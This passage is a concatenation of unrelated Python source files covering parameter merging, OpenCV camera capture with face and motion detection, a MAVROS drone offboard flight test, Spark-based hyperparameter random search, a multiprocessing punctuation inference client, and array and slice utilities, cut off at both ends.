Parameter, the merged parameter which has the whole data.
Raises:
ValueError: Failed to merge.
TypeError: The sliced_parameters is incorrect or strategy is not dict.
KeyError: The parameter name is not in keys of strategy.
Examples:
>>> strategy = build_searched_strategy("./strategy_train.ckpt")
>>> sliced_parameters = [
>>> Parameter(Tensor(np.array([0.00023915, 0.00013939, -0.00098059])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00015815, 0.00015458, -0.00012125])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00042165, 0.00029692, -0.00007941])),
>>> "network.embedding_table"),
>>> Parameter(Tensor(np.array([0.00084451, 0.00089960, -0.00010431])),
>>> "network.embedding_table")]
>>> merged_parameter = merge_sliced_parameter(sliced_parameters, strategy)
"""
if not isinstance(sliced_parameters, list):
raise TypeError(f"The sliced_parameters should be list, but got {type(sliced_parameters)}.")
if not sliced_parameters:
raise ValueError("The sliced_parameters should not be empty.")
if strategy and not isinstance(strategy, dict):
raise TypeError(f"The strategy should be dict, but got {type(strategy)}.")
try:
parameter_name = sliced_parameters[0].name
parameter_shape = sliced_parameters[0].data.shape
parameter_shape_length = len(parameter_shape)
except BaseException as e:
raise TypeError(f"{e.__str__()}. the element in sliced_parameters should be Parameter.")
is_even = True
for index, parameter in enumerate(sliced_parameters):
if not isinstance(parameter, Parameter):
raise TypeError(f"The element in sliced_parameters should be Parameter, "
f"but got {type(parameter)} at index {index}.")
if parameter.name != parameter_name \
or len(parameter.data.shape) != parameter_shape_length \
or parameter.data.shape[1:] != parameter_shape[1:]:
raise ValueError("Please make sure that the elements in slice_parameters have the same name, "
"dimension length and shape except 0 axis")
if parameter.data.shape != parameter_shape:
is_even = False
layerwise_parallel = sliced_parameters[0].layerwise_parallel
requires_grad = sliced_parameters[0].requires_grad
sliced_data = [parameter.data.asnumpy() for parameter in sliced_parameters]
merged_parameter = None
if not strategy:
merged_tensor = Tensor(np.concatenate(sliced_data))
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
else:
if parameter_name not in strategy.keys():
raise KeyError(f"The parameter name should be one key of strategy. "
f"the parameter name is {parameter_name}.")
merged_tensor = _merge_param_with_strategy(sliced_data, parameter_name, strategy, is_even)
merged_parameter = Parameter(merged_tensor, parameter_name, requires_grad, layerwise_parallel)
return merged_parameter
_set_pb_env()
|
video.py
|
#!/usr/bin/env python
import cv2
import numpy as np
import time
from threading import Thread
from queue import Queue
from datetime import datetime
from motion import Detector
def putIterationsPerSec(frame, iterations_per_sec):
"""
Add iterations per second text to lower-left corner of a frame.
"""
cv2.putText(frame, "{:.0f} iterations/sec".format(iterations_per_sec),
(10, 450), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (255, 255, 255))
return frame
class CountsPerSec:
"""
Class that tracks the number of occurrences ("counts") of an
arbitrary event and returns the frequency in occurrences
(counts) per second. The caller must increment the count.
"""
def __init__(self):
self._start_time = None
self._num_occurrences = 0
def start(self):
self._start_time = datetime.now()
return self
def increment(self):
self._num_occurrences += 1
def countsPerSec(self):
elapsed_time = (datetime.now() - self._start_time).total_seconds()
return self._num_occurrences / elapsed_time if elapsed_time > 0 else 0
class CameraReader(object):
def __init__(self, cam):
self.cam = cam
self.q = Queue(maxsize=10)
self.running = 1
def start(self):
Thread(target=self.run, args=()).start()
return self
def run(self):
while self.running:
success, image = self.cam.read()
if success:
self.q.put(image)
def stop(self):
self.running = False
class UsbCamera(object):
""" Init camera """
def __init__(self, dev=0):
# select first video device in system
self.cam = cv2.VideoCapture(dev)
# set camera resolution
self.w = 640
self.h = 480
# set crop factor
self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, self.h)
self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, self.w)
# load cascade file
self.face_cascade = cv2.CascadeClassifier('face.xml')
self.running = True
self.cps = CountsPerSec().start()
self.q = Queue(maxsize=100)
self.detector = Detector()
# self.reader = CameraReader(self.cam).start()
def start(self):
Thread(target=self.run, args=()).start()
return self
def stop(self):
# self.reader.stop()
self.running = False
def run(self):
while self.running:
jpeg, image = self.get_frame()
self.q.put(jpeg)
self.cps.increment()
def set_resolution(self, new_w, new_h):
"""
functionality: Change camera resolution
inputs: new_w, new_h - with and height of picture, must be int
returns: None ore raise exception
"""
if isinstance(new_h, int) and isinstance(new_w, int):
# check if args are int and correct
if (new_w <= 800) and (new_h <= 600) and \
(new_w > 0) and (new_h > 0):
self.h = new_h
self.w = new_w
else:
# bad params
raise Exception('Bad resolution')
else:
# bad params
raise Exception('Not int value')
def face_recognition(self, image):
# resize image for speeding up recognize
gray = cv2.resize(image, (320, 240))
# make it grayscale
gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY)
# face cascade detector
faces = self.face_cascade.detectMultiScale(gray)
# draw rect on face arias
scale = float(self.w / 320.0)
count = 0
for f in faces:
font = cv2.FONT_HERSHEY_SIMPLEX
x, y, z, t = [int(float(v) * scale) for v in f]
cv2.putText(image, str(x) + ' ' + str(y), (0, (self.h - 10 - 25 * count)), font, 1, (0, 0, 0), 2)
count += 1
cv2.rectangle(image, (x, y), (x + z, y + t), (255, 255, 255), 2)
return image
def get_frame(self, fdenable=False, motion_detection=True):
"""
functionality: Gets frame from camera and try to find feces on it
:return: byte array of jpeg encoded camera frame
"""
t0 = time.time()
success, image = self.cam.read()
# image = self.reader.q.get()
# self.reader.q.task_done()
# success = True
t1 = time.time()
if success:
# scale image
# image = cv2.resize(image, (self.w, self.h))
if fdenable:
image = self.face_recognition(image)
if motion_detection:
image = self.detector.detect(image)
else:
image = np.zeros((self.h, self.w, 3), np.uint8)
cv2.putText(image, 'No camera', (40, 60), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 1)
# encoding picture to jpeg
image = putIterationsPerSec(image, self.cps.countsPerSec())
t2 = time.time()
ret, jpeg = cv2.imencode('.jpg', image)
t3 = time.time()
# print(t1-t0, t2-t1, t3-t2)
return jpeg.tobytes(), image
if __name__=='__main__':
cam = UsbCamera(1).start()
last_image = None
while 1:
grabbed_frame = False
try:
image = cam.q.get(block=False)
last_image = image
grabbed_frame = True
except:
if last_image is None:
continue
# frame = putIterationsPerSec(last_image, cps.countsPerSec())
cv2.imshow("the pol", frame)
if grabbed_frame:
cam.q.task_done()
# cps.increment()
key = cv2.waitKey(1)
if key == ord('q'):
cam.stop()
break
|
mavros_offboard_posctl.py
|
#!/usr/bin/env python
import rospy
import math
import numpy as np
from geometry_msgs.msg import PoseStamped
from mavros_msgs.msg import PositionTarget
from mavros_function import MavrosFunction
from pymavlink import mavutil
from std_msgs.msg import Header
from threading import Thread
class MavrosOffboardPosctl(MavrosFunction):
"""
Tests flying in swing motion at a certain height in offboard control
by sending raw setpoints with appropriate type mask (z, vx, vy) via MAVROS.
For the test to be successful it needs to reach the target height in a certain time.
"""
def __init__(self):
rospy.init_node('offboard_control_node')
super(MavrosOffboardPosctl, self).__init__()
self.raw_point = PositionTarget()
self.radius = 0.15
self.raw_setpoint_pb = rospy.Publisher('mavros/setpoint_raw/local', PositionTarget, queue_size =10)
# send raw setpoints in separate thread to better prevent failsafe
self.pos_thread = Thread(target=self.send_pos, args=())
self.pos_thread.daemon = True
self.pos_thread.start()
#
# Helper method
#
def send_pos(self):
rate = rospy.Rate(20) #Hz
self.raw_point.header = Header()
self.raw_point.header.frame_id = "base_footprint"
while not rospy.is_shutdown():
self.raw_point.header.stamp = rospy.Time.now()
self.raw_point.coordinate_frame = 8
self.raw_point.type_mask = 3064 #1475
self.raw_setpoint_pb.publish(self.raw_point)
try:
rate.sleep()
except rospy.ROSException as e:
rospy.logerr(e)
def is_at_position(self, x, y, z, offset):
"""offset: meters"""
rospy.logdebug("current position | x:{0:.2f}, y:{1:.2f}, z:{2:.2f}".
format(self.local_position.pose.position.x, self.local_position.pose.position.y,
self.local_position.pose.position.z))
target_pos = np.array((x, y, z))
current_pos = np.array((self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
return np.linalg.norm(target_pos - current_pos) < offset
def is_at_height(self, h, offset):
"""offset: meters"""
rospy.logdebug("current height | h:{0:.2f}".format(self.local_position.pose.position.z))
return h - self.local_position.pose.position.z < offset
def reach_position(self, x, y, z, timeout):
"""timeout(int): seconds"""
# set a position setpoint
self.raw_point.position.x = x
self.raw_point.position.y = y
self.raw_point.position.z = z
rospy.loginfo("attempting to reach position | x: {0}, y: {1}, z: {2} | current position x: {3:.2f}, y: {4:.2f}, z: {5:.2f}".
format(x, y, z, self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z))
# does it reach the position in 'timeout' seconds?
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
# reached = False
for i in range(timeout*loop_freq):
if self.is_at_position(self.raw_point.position.x,
self.raw_point.position.y,
self.raw_point.position.z, self.radius):
rospy.loginfo("position reached | seconds: {0} of {1}".format(i/loop_freq, timeout))
# reached = True
break
try:
rate.sleep()
except rospy.ROSException as e:
rospy.logerr(e)
def swing_motion(self, vx, h, timeout):
"""timeout(int): seconds"""
rospy.loginfo("producing swing motion with velocity, at height | vx: {0:.2f}, h: {1:.2f}".format(vx, h))
loop_freq = 0.8
rate = rospy.Rate(loop_freq)
for i in range(int(timeout*loop_freq)):
self.raw_point.position.z = h
self.raw_point.velocity.x = vx
vx = -vx
try:
rate.sleep()
except rospy.ROSException as e:
rospy.logerr(e)
self.raw_point.velocity.x = 0
def test_swing_motion(self):
"""Test swing motion at a certain height"""
# make sure topics are ready
self.wait_for_topics(60)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND, 10, -1)
self.log_topic_vars()
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
positions = [[0, 0, 1.7], [1, 0, 1.7], [0, 0, 1.7]]
# positions = [[0, 0, 1.7]]
# self.swing_motion(0., 2.0, 10)
for position in positions:
self.reach_position(position[0], position[1], position[2], 30)
self.set_mode("AUTO.LAND", 5)
self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND, 45, 0)
self.set_arm(False, 5)
if __name__ == '__main__':
swing_act = MavrosOffboardPosctl()
swing_act.test_swing_motion()
|
random_search.py
|
"""
Random Search implementation
"""
from hops import util
from hops import hdfs as hopshdfs
from hops import tensorboard
from hops import devices
import pydoop.hdfs
import threading
import six
import datetime
import os
import random
run_id = 0
def _launch(sc, map_fun, args_dict, samples, direction='max', local_logdir=False, name="no-name"):
"""
Args:
sc:
map_fun:
args_dict:
local_logdir:
name:
Returns:
"""
global run_id
app_id = str(sc.applicationId)
arg_lists = list(args_dict.values())
for i in range(len(arg_lists)):
if len(arg_lists[i]) != 2:
raise ValueError('Boundary list must contain exactly two elements, [lower_bound, upper_bound] for each hyperparameter')
hp_names = args_dict.keys()
random_dict = {}
for hp in hp_names:
lower_bound = args_dict[hp][0]
upper_bound = args_dict[hp][1]
assert lower_bound < upper_bound, "lower bound: " + str(lower_bound) + " must be less than upper bound: " + str(upper_bound)
random_values = []
if type(lower_bound) == int and type(upper_bound) == int:
for i in range(samples):
random_values.append(random.randint(lower_bound, upper_bound))
elif type(lower_bound) == float and type(upper_bound) == float:
for i in range(samples):
random_values.append(random.uniform(lower_bound, upper_bound))
else:
raise ValueError('Only float and int is currently supported')
random_dict[hp] = random_values
random_dict, new_samples = _remove_duplicates(random_dict, samples)
sc.setJobGroup("Random Search", "{} | Hyperparameter Optimization".format(name))
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(new_samples), new_samples)
job_start = datetime.datetime.now()
nodeRDD.foreachPartition(_prepare_func(app_id, run_id, map_fun, random_dict, local_logdir))
job_end = datetime.datetime.now()
job_time_str = util._time_diff(job_start, job_end)
arg_count = six.get_function_code(map_fun).co_argcount
arg_names = six.get_function_code(map_fun).co_varnames
hdfs_appid_dir = hopshdfs._get_experiments_dir() + '/' + app_id
hdfs_runid_dir = _get_logdir(app_id)
max_val, max_hp, min_val, min_hp, avg = _get_best(random_dict, new_samples, arg_names, arg_count, hdfs_appid_dir, run_id)
param_combination = ""
best_val = ""
if direction == 'max':
param_combination = max_hp
best_val = str(max_val)
results = '\n------ Random Search results ------ direction(' + direction + ') \n' \
'BEST combination ' + max_hp + ' -- metric ' + str(max_val) + '\n' \
'WORST combination ' + min_hp + ' -- metric ' + str(min_val) + '\n' \
'AVERAGE metric -- ' + str(avg) + '\n' \
'Total job time ' + job_time_str + '\n'
_write_result(hdfs_runid_dir, results)
print(results)
elif direction == 'min':
param_combination = min_hp
best_val = str(min_val)
results = '\n------ Random Search results ------ direction(' + direction + ') \n' \
'BEST combination ' + min_hp + ' -- metric ' + str(min_val) + '\n' \
'WORST combination ' + max_hp + ' -- metric ' + str(max_val) + '\n' \
'AVERAGE metric -- ' + str(avg) + '\n' \
'Total job time ' + job_time_str + '\n'
_write_result(hdfs_runid_dir, results)
print(results)
print('Finished Experiment \n')
return hdfs_runid_dir, param_combination, best_val
def _remove_duplicates(random_dict, samples):
hp_names = random_dict.keys()
concatenated_hp_combs_arr = []
for index in range(samples):
separated_hp_comb = ""
for hp in hp_names:
separated_hp_comb = separated_hp_comb + str(random_dict[hp][index]) + "%"
concatenated_hp_combs_arr.append(separated_hp_comb)
entry_index = 0
indices_to_skip = []
for entry in concatenated_hp_combs_arr:
inner_index = 0
for possible_dup_entry in concatenated_hp_combs_arr:
if entry == possible_dup_entry and inner_index > entry_index:
indices_to_skip.append(inner_index)
inner_index = inner_index + 1
entry_index = entry_index + 1
indices_to_skip = list(set(indices_to_skip))
for hp in hp_names:
index = 0
pruned_duplicates_arr = []
for random_value in random_dict[hp]:
if index not in indices_to_skip:
pruned_duplicates_arr.append(random_value)
index = index + 1
random_dict[hp] = pruned_duplicates_arr
return random_dict, samples - len(indices_to_skip)
def _get_logdir(app_id):
"""
Args:
app_id:
Returns:
"""
global run_id
return hopshdfs._get_experiments_dir() + '/' + app_id + '/random_search/run.' + str(run_id)
#Helper to put Spark required parameter iter in function signature
def _prepare_func(app_id, run_id, map_fun, args_dict, local_logdir):
"""
Args:
app_id:
run_id:
map_fun:
args_dict:
local_logdir:
Returns:
"""
def _wrapper_fun(iter):
"""
Args:
iter:
Returns:
"""
for i in iter:
executor_num = i
tb_pid = 0
tb_hdfs_path = ''
hdfs_exec_logdir = ''
t = threading.Thread(target=devices._print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t.start()
try:
#Arguments
if args_dict:
argcount = six.get_function_code(map_fun).co_argcount
names = six.get_function_code(map_fun).co_varnames
args = []
argIndex = 0
param_string = ''
while argcount > 0:
#Get args for executor and run function
param_name = names[argIndex]
param_val = args_dict[param_name][executor_num]
param_string += str(param_name) + '=' + str(param_val) + '.'
args.append(param_val)
argcount -= 1
argIndex += 1
param_string = param_string[:-1]
hdfs_exec_logdir, hdfs_appid_logdir = hopshdfs._create_directories(app_id, run_id, param_string, 'random_search')
pydoop.hdfs.dump('', os.environ['EXEC_LOGFILE'], user=hopshdfs.project_user())
hopshdfs._init_logger()
tb_hdfs_path, tb_pid = tensorboard._register(hdfs_exec_logdir, hdfs_appid_logdir, executor_num, local_logdir=local_logdir)
gpu_str = '\nChecking for GPUs in the environment' + devices._get_gpu_info()
hopshdfs.log(gpu_str)
print(gpu_str)
print('-------------------------------------------------------')
print('Started running task ' + param_string + '\n')
hopshdfs.log('Started running task ' + param_string)
task_start = datetime.datetime.now()
retval = map_fun(*args)
task_end = datetime.datetime.now()
_handle_return(retval, hdfs_exec_logdir)
time_str = 'Finished task ' + param_string + ' - took ' + util._time_diff(task_start, task_end)
print('\n' + time_str)
print('Returning metric ' + str(retval))
print('-------------------------------------------------------')
hopshdfs.log(time_str)
except:
#Always do cleanup
_cleanup(tb_hdfs_path)
if devices.get_num_gpus() > 0:
t.do_run = False
t.join(20)
raise
finally:
try:
if local_logdir:
local_tb = tensorboard.local_logdir_path
util._store_local_tensorboard(local_tb, hdfs_exec_logdir)
except:
pass
_cleanup(tb_hdfs_path)
if devices.get_num_gpus() > 0:
t.do_run = False
t.join(20)
return _wrapper_fun
def _cleanup(tb_hdfs_path):
"""
Args:
tb_hdfs_path:
Returns:
"""
global experiment_json
handle = hopshdfs.get()
if not tb_hdfs_path == None and not tb_hdfs_path == '' and handle.exists(tb_hdfs_path):
handle.delete(tb_hdfs_path)
hopshdfs._kill_logger()
def _handle_return(val, hdfs_exec_logdir):
"""
Args:
val:
hdfs_exec_logdir:
Returns:
"""
try:
test = int(val)
except:
raise ValueError('Your function needs to return a metric (number) which should be maximized or minimized')
metric_file = hdfs_exec_logdir + '/metric'
fs_handle = hopshdfs.get_fs()
try:
fd = fs_handle.open_file(metric_file, mode='w')
except:
fd = fs_handle.open_file(metric_file, flags='w')
fd.write(str(float(val)).encode())
fd.flush()
fd.close()
def _get_best(args_dict, num_combinations, arg_names, arg_count, hdfs_appid_dir, run_id):
"""
Args:
args_dict:
num_combinations:
arg_names:
arg_count:
hdfs_appid_dir:
run_id:
Returns:
"""
max_hp = ''
max_val = ''
min_hp = ''
min_val = ''
results = []
first = True
for i in range(num_combinations):
argIndex = 0
param_string = ''
num_args = arg_count
while num_args > 0:
#Get args for executor and run function
param_name = arg_names[argIndex]
param_val = args_dict[param_name][i]
param_string += str(param_name) + '=' + str(param_val) + '.'
num_args -= 1
argIndex += 1
param_string = param_string[:-1]
path_to_metric = hdfs_appid_dir + '/random_search/run.' + str(run_id) + '/' + param_string + '/metric'
metric = None
with pydoop.hdfs.open(path_to_metric, "r") as fi:
metric = float(fi.read())
fi.close()
if first:
max_hp = param_string
max_val = metric
min_hp = param_string
min_val = metric
first = False
if metric > max_val:
max_val = metric
max_hp = param_string
if metric < min_val:
min_val = metric
min_hp = param_string
results.append(metric)
avg = sum(results)/float(len(results))
return max_val, max_hp, min_val, min_hp, avg
def _write_result(runid_dir, string):
"""
Args:
runid_dir:
string:
Returns:
"""
metric_file = runid_dir + '/summary'
fs_handle = hopshdfs.get_fs()
try:
fd = fs_handle.open_file(metric_file, mode='w')
except:
fd = fs_handle.open_file(metric_file, flags='w')
fd.write(string.encode())
fd.flush()
fd.close()
|
inference_interface.py
|
import logging
import multiprocessing as mp
import signal
import struct
import threading
from threading import Thread
from time import sleep
from typing import List, Tuple
from .inference_pipeline import InferenceServer
# from utils.utils import register_logger
logger = logging.getLogger(__name__)
# register_logger(logger)
class InferenceClient:
"""Inference client for communicating with punctuator server"""
def __init__(self, conn, check_interval=0.1) -> None:
self.conn = conn
self.check_interval = check_interval
def punctuation(self, inputs):
self.conn.send(inputs)
while True:
try:
if self.conn.poll(self.check_interval):
outputs = self.conn.recv()
return outputs
except (struct.error, OSError) as err:
logger.warning(f"{self.name} struct unpack error: {err}")
raise err
def terminate(self):
"""graceful shutdown everything"""
logger.info("terminate the client")
self.conn.close()
class Inference:
"""Interface for using the punctuator"""
def __init__(
self,
inference_args,
method="spawn",
server_check_interval=0.1,
task_check_interval=0.05,
verbose=False,
) -> None:
"""Inference class for using the punctuator
Args:
inference_args (InferenceArguments): inference arguments
method (str, optional): "fork" or "spawn". Defaults to "spawn".
server_check_interval (float, optional): interval to check punctuator running status. Defaults to 0.1.
task_check_interval (float, optional): interval to check new task. Defaults to 0.05.
verbose (bool, optional): whether to ouput punctuation progress. Defaults to False.
"""
self.termination = mp.get_context(method).Event()
self.method = method
self.inference_args = inference_args
self.verbose = verbose
self.task_check_interval = task_check_interval
self._init_termination()
self._produce_server(task_check_interval)
self.thread = Thread(target=self._run, args=(server_check_interval,))
self.thread.start()
def _produce_server(self, task_check_interval):
logger.info("set up punctuator")
self.c_conn, self.s_conn = mp.Pipe(True)
server = InferenceServer(
inference_args=self.inference_args,
conn=self.s_conn,
termination=self.termination,
check_interval=task_check_interval,
verbose=self.verbose,
)
self.server_process = mp.get_context(self.method).Process(
target=server.run,
)
logger.info("start running punctuator")
self.server_process.start()
logger.info("start client")
self.client = InferenceClient(conn=self.c_conn)
def _init_termination(self):
"""init signal handler and termination event"""
self.shutdown = threading.Event()
signal.signal(signal.SIGTERM, self._terminate)
signal.signal(signal.SIGINT, self._terminate)
def _terminate(self, signum, frame):
"""graceful shutdown everything"""
logger.info(f"[{signum}] terminate inference: {frame}")
self.shutdown.set()
self.termination.set()
self.client.terminate()
def _run(self, check_interval):
while not self.shutdown.is_set():
if self.server_process.exitcode is not None:
logger.warning("punctuator is no longer working, restart")
self._produce_server(self.task_check_interval)
sleep(check_interval)
logger.info("terminate the punctuator")
# self.server_process.terminate()
def punctuation(self, inputs: List[str]) -> Tuple[List[str], List[List]]:
"""Do punctuation of inputs
Args:
inputs (List[str]): list of plain text (no punctuated text)
Returns:
Tuple[List[str], List[List]]: tuple of outputs.
First is the list of punctuated text
Second is the list of labels
"""
try:
outputs_tuple = self.client.punctuation(inputs)
return outputs_tuple
except Exception as err:
logger.error(f"error doing punctuation with details {str(err)}")
return None
def terminate(self):
self.shutdown.set()
self.termination.set()
self.client.terminate()
|
utils.py
|
import os
import os.path
import io
import tempfile
import json as js
import re
from itertools import tee
from functools import wraps
import functools as ft
import threading
from urllib.parse import urlparse as parse_url
from urllib.parse import parse_qs
import numpy as np
import keyword
import uuid
from .bitmap import bitmap
from ..core import aio
try:
import collections.abc as collections_abc # only works on python 3.3+
except ImportError:
import collections as collections_abc
from multiprocessing import Process
from pandas.io.common import is_url
import requests
import s3fs
import stat as st
integer_types = (int, np.integer)
def is_int(n):
return isinstance(n, integer_types)
def is_str(s):
return isinstance(s, str)
def is_slice(s):
return isinstance(s, slice)
def is_iterable(it):
return isinstance(it, collections_abc.Iterable)
def is_iter_str(it):
if not is_iterable(it):
return False
for s in it:
if not is_str(s):
return False
return True
def len_none(item):
return 0 if item is None else len(item)
def pairwise(iterator):
a, b = tee(iterator)
next(b, None)
return zip(a, b)
def is_sorted(iterator, compare=None):
if compare is None:
def compare(a, b):
return a <= b
return all(compare(a, b) for a, b in pairwise(iterator))
def remove_nan(d):
if isinstance(d, float) and np.isnan(d):
return None
if isinstance(d, list):
for i, v in enumerate(d):
if isinstance(v, float) and np.isnan(v):
d[i] = None
else:
remove_nan(v)
elif isinstance(d, collections_abc.Mapping):
for k, v in d.items():
if isinstance(v, float) and np.isnan(v):
d[k] = None
else:
remove_nan(v)
return d
def find_nan_etc(d):
if isinstance(d, float) and np.isnan(d):
return None
if isinstance(d, np.integer):
print('numpy int: %s' % (d))
return int(d)
if isinstance(d, np.bool_):
return bool(d)
if isinstance(d, np.ndarray):
print('numpy array: %s' % (d))
if isinstance(d, list):
for i, v in enumerate(d):
if isinstance(v, float) and np.isnan(v):
print('numpy nan at %d in: %s' % (i, d))
elif isinstance(v, np.integer):
print('numpy int: %s at %d in %s' % (v, i, d))
elif isinstance(v, np.bool_):
print('numpy bool: %d in %s' % (i, d))
elif isinstance(v, np.ndarray):
print('numpy array: %d in %s' % (i, d))
else:
find_nan_etc(v)
elif isinstance(d, collections_abc.Mapping):
for k, v in d.items():
if isinstance(v, float) and np.isnan(v):
print('numpy nan at %s in: %s' % (k, d))
elif isinstance(v, np.integer):
print('numpy int: %s in %s' % (k, d))
elif isinstance(v, np.bool_):
print('numpy bool: %s in %s' % (k, d))
elif isinstance(v, np.ndarray):
print('numpy array: %s in %s' % (k, d))
else:
find_nan_etc(v)
def remove_nan_etc(d):
if isinstance(d, float) and np.isnan(d):
return None
if isinstance(d, np.integer):
return int(d)
if isinstance(d, np.bool_):
return bool(d)
if isinstance(d, list):
for i, v in enumerate(d):
if isinstance(v, float) and np.isnan(v):
d[i] = None
elif isinstance(v, np.integer):
d[i] = int(v)
elif isinstance(v, np.bool_):
d[i] = bool(v)
else:
d[i] = remove_nan_etc(v)
elif isinstance(d, collections_abc.Mapping):
for k, v in d.items():
if isinstance(v, float) and np.isnan(v):
d[k] = None
elif isinstance(v, np.integer):
d[k] = int(v)
elif isinstance(v, np.bool_):
d[k] = bool(v)
elif isinstance(v, np.ndarray):
d[k] = remove_nan_etc(v.tolist())
else:
d[k] = remove_nan_etc(v)
return d
class AttributeDict(object):
def __init__(self, d):
self.d = d
def __getattr__(self, attr):
return self.__dict__['d'][attr]
def __getitem__(self, key):
return self.__getattribute__('d')[key]
def __dir__(self):
return list(self.__getattribute__('d').keys())
ID_RE = re.compile(r'[_A-Za-z][_a-zA-Z0-9]*')
def is_valid_identifier(s):
m = ID_RE.match(s)
return bool(m and m.end(0) == len(s) and
not keyword.iskeyword(s))
def fix_identifier(c):
m = ID_RE.match(c)
if m is None:
c = '_' + c
m = ID_RE.match(c)
while m.end(0) != len(c):
c = c[:m.end(0)] + '_' + c[m.end(0)+1:]
m = ID_RE.match(c)
return c
def gen_columns(n):
return ["_"+str(i) for i in range(1, n+1)]
def type_fullname(o):
module = o.__class__.__module__
if module is None or module == str.__class__.__module__:
return o.__class__.__name__
return module + '.' + o.__class__.__name__
def indices_len(ind):
if isinstance(ind, slice):
if ind.step is None or ind.step == 1:
return ind.stop-ind.start
else:
return len(range(*ind.indices(ind.stop)))
if ind is None:
return 0
return len(ind)
def fix_loc(indices):
if isinstance(indices, slice):
return slice(indices.start, indices.stop-1) # semantic of slice .loc
return indices
# See http://graphics.stanford.edu/~seander/bithacks.html#RoundUpPowerOf2Float
def next_pow2(v):
v -= 1
v |= v >> 1
v |= v >> 2
v |= v >> 4
v |= v >> 8
v |= v >> 16
v |= v >> 32
return v+1
def indices_to_slice(indices):
if len(indices) == 0:
return slice(0, 0)
s = e = None
for i in indices:
if s is None:
s = e = i
elif i == e or i == e+1:
e = i
else:
return indices # not sliceable
return slice(s, e+1)
def _first_slice(indices):
# assert isinstance(indices, bitmap)
ei = enumerate(indices, indices[0])
mask = np.equal(*zip(*ei))
arr = np.array(indices)
head = arr[mask]
tail = arr[len(head):]
return head, tail
def iter_to_slices(indices, fix_loc=False):
tail = np.sort(indices)
last = tail[-1]
incr = 0 if fix_loc else 1
slices = []
while len(tail):
head, tail = _first_slice(tail)
stop = head[-1]+incr if head[-1] < last else None
slices.append(slice(head[0], stop, 1))
return slices
def norm_slice(sl, fix_loc=False, stop=None):
if (sl.start is not None and sl.step == 1):
return sl
start = 0 if sl.start is None else sl.start
step = 1 if sl.step is None else sl.step
if stop is None:
stop = sl.stop
if fix_loc:
assert stop is not None
stop += 1
return slice(start, stop , step)
def is_full_slice(sl):
if not isinstance(sl, slice):
return False
nsl = norm_slice(sl)
return nsl.start == 0 and nsl.step == 1 and nsl.stop is None
def inter_slice(this, that):
bz = bitmap([])
if this is None:
return bz, bz, norm_slice(that)
if that is None:
return norm_slice(this), bz, bz
if isinstance(this, slice) and isinstance(that, slice):
this = norm_slice(this)
that = norm_slice(that)
if this == that:
return bz, this, bz
if this.step == 1 and this.step == 1:
if this.start >= that.start and this.stop <= that.stop:
return bz, this, bitmap(that)-bitmap(this)
if that.start >= this.start and that.stop <= this.stop:
return bitmap(this)-bitmap(that), that, bz
if this.stop <= that.start or that.stop <= this.start:
return this, bz, that
if this.start < that.start:
left = this
right = that
else:
left = that
right = this
common_ = slice(max(left.start, right.start),
min(left.stop, right.stop), 1)
only_left = slice(left.start, common_.start)
only_right = slice(common_.stop, right.stop)
if left == this:
return only_left, common_, only_right
else:
return only_right, common_, only_left
# else: # TODO: can we improve it when step >1 ?
else:
if not isinstance(this, bitmap):
this = bitmap(this)
if not isinstance(that, bitmap):
that = bitmap(that)
common_ = this & that
only_this = this - that
only_that = that - this
return only_this, common_, only_that
def slice_to_array(sl):
if isinstance(sl, slice):
# return bitmap(range(*sl.indices(sl.stop)))
return bitmap(sl)
return sl
def slice_to_bitmap(sl, stop=None):
stop = sl.stop if stop is None else stop
assert is_int(stop)
return bitmap(range(*sl.indices(stop)))
def slice_to_arange(sl):
if isinstance(sl, slice):
assert is_int(sl.stop)
return np.arange(*sl.indices(sl.stop))
if isinstance(sl, np.ndarray):
return sl
return np.array(sl)
def get_random_name(prefix):
return prefix+str(uuid.uuid4()).split('-')[-1]
def all_string(it):
return all([isinstance(elt, str) for elt in it])
def all_int(it):
return all([isinstance(elt, integer_types) for elt in it])
def all_string_or_int(it):
return all_string(it) or all_int(it)
def all_bool(it):
if hasattr(it, 'dtype'):
return it.dtype == bool
return all([isinstance(elt, bool) for elt in it])
def are_instances(it, type_):
if hasattr(it, 'dtype'):
return it.dtype in type_ if isinstance(type_, tuple) else\
it.type == type_
return all([isinstance(elt, type_) for elt in it])
def is_fancy(key):
return (isinstance(key, np.ndarray) and key.dtype == np.int64) or \
isinstance(key, collections_abc.Iterable)
def fancy_to_mask(indexes, array_shape, mask=None):
if mask is None:
mask = np.zeros(array_shape, dtype=np.bool)
else:
mask.fill(0)
mask[indexes] = True
return mask
def mask_to_fancy(mask):
return np.where(mask)
def is_none_alike(x):
if isinstance(x, slice) and x == slice(None, None, None):
return True
return x is None
def are_none(*args):
for e in args:
if e is not None:
return False
return True
class RandomBytesIO(object):
def __init__(self, cols=1, size=None, rows=None, **kwargs):
self._pos = 0
self._reminder = ""
self._cols = cols
if size is not None and rows is not None:
raise ValueError("'size' and 'rows' "
"can not be supplied simultaneously")
self._generator = self.get_row_generator(**kwargs)
self._yield_size = len(next(self._generator))
if size is not None:
rem = size % self._yield_size
if rem:
self._size = size - rem + self._yield_size
self._rows = size // self._yield_size + 1
else:
self._size = size
self._rows = size // self._yield_size
elif rows is not None:
self._rows = rows
self._size = rows * self._yield_size
else:
raise ValueError("One of 'size' and 'rows' "
"must be supplied (put 0 "
"for an infinite loop)")
# WARNING: the choice of the mask must guarantee a fixed size for the rows
def get_row_generator(self, mask='{: 8.7e}',
loc=0.5, scale=0.8, seed=1234):
row_mask = ','.join([mask]*self._cols)+'\n'
np.random.seed(seed=seed)
while True:
